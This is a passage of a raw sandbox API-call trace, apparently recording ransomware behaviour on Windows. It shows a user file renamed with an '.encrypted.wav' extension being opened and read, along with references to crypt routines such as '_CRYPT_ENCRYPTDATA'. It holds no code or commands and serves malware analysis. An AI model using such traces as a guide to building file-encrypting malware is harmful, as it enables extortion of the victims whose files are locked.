halpmcxz\\music\\y6ubt-qdhh8vkxog3x\\zah-2jgjs1xf027twp.encrypted.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0038.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0038.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0038.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0038.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0038.865] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0038.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0038.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0038.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0038.866] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0038.866] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0038.866] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0038.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0038.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0038.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0038.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0038.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0038.867] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0038.867] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0xfa32, lpOverlapped=0x0) returned 1 [0038.869] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0038.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0038.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xfa32) returned 0xac0018 [0038.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0038.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0038.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0038.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0038.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xfa32) returned 0xacfa58 [0038.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.873] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0038.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xfa32) returned 0xac0018 [0038.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0038.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.874] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0038.874] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0038.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.874] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0038.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0038.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0038.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0038.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0038.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xfa32) returned 0xac0018 [0038.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0038.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0038.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0038.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0038.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0038.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0038.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0038.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0038.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0038.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0038.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0038.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbb0 [0038.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0038.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0038.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0038.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xfa32) returned 0x935008 [0038.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0038.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0038.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0038.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0038.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0038.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0038.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0038.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0038.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0038.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0038.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0038.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0038.877] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0038.878] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0038.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0038.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0038.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0038.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0038.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0038.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0038.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0038.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0038.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.878] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0038.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0038.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0038.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2b8 [0038.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0038.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0038.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0038.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0038.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8c8 [0038.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0038.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0038.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0038.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.879] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0038.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0038.879] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0038.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0038.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0038.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0038.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0038.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0038.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0038.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0038.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0038.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0038.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0038.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0038.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.880] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0038.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0038.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0038.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0038.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0038.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0038.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0038.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0038.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0038.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0038.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0038.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0038.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0038.881] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0038.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0038.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0038.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0038.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0038.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0038.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0038.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0038.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0038.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.881] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 